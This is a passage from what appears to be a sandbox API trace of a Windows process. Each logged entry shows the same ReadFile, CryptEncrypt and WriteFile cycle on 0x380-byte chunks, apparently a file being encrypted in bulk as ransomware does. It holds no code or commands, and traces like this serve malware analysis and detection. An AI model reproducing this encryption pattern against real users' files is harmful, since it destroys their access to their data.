lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.895] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.895] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.895] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.895] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.896] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.896] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.896] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.896] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.896] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.896] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.896] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.896] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.896] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.896] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.896] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.896] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.897] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.897] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.897] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.897] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.897] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.897] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.897] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.897] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.898] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.898] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.898] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.898] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.898] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.898] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.898] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.898] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.898] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.898] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.898] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.898] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.899] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.899] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.899] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.899] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.899] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.899] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.899] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.899] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.899] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.899] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.899] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.899] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.899] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.900] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.900] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.900] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.900] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.900] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.900] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.900] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.900] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.900] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.900] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.900] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.900] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.900] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.900] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.901] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.901] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.901] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.901] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.901] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.901] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.901] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.901] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.901] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.901] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.901] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.901] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.901] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.902] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.902] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.902] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.902] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.902] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.902] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.902] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.902] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.902] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.902] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.902] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.902] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.902] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.903] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.903] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.903] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.903] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.903] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.903] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.903] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.903] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, 